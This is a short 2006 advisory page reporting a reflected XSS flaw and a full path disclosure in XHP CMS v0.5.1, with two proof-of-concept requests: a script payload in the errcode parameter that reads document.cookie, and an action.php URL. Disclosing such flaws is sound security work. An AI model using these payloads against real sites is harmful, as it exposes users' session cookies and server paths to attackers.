XHP CMS v0.5.1 Vuls Xss and Full path vuls

2006.09.18

Credit: HACKERS PAL

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-4751 | CVE-2006-4752

CWE: N/A

Hello,,

XHP CMS v0.5.1 Vuls

Discovered By : HACKERS PAL

Copy rights : HACKERS PAL

Website : http://www.soqor.net

Email Address : security (at) soqor (dot) net [email concealed]

Xss

index.php?errcode=<script>alert(document.cookie);</script>

Full path

action.php?action=1&module=engine

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

XHP CMS v0.5.1 Vuls Xss and Full path vuls

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.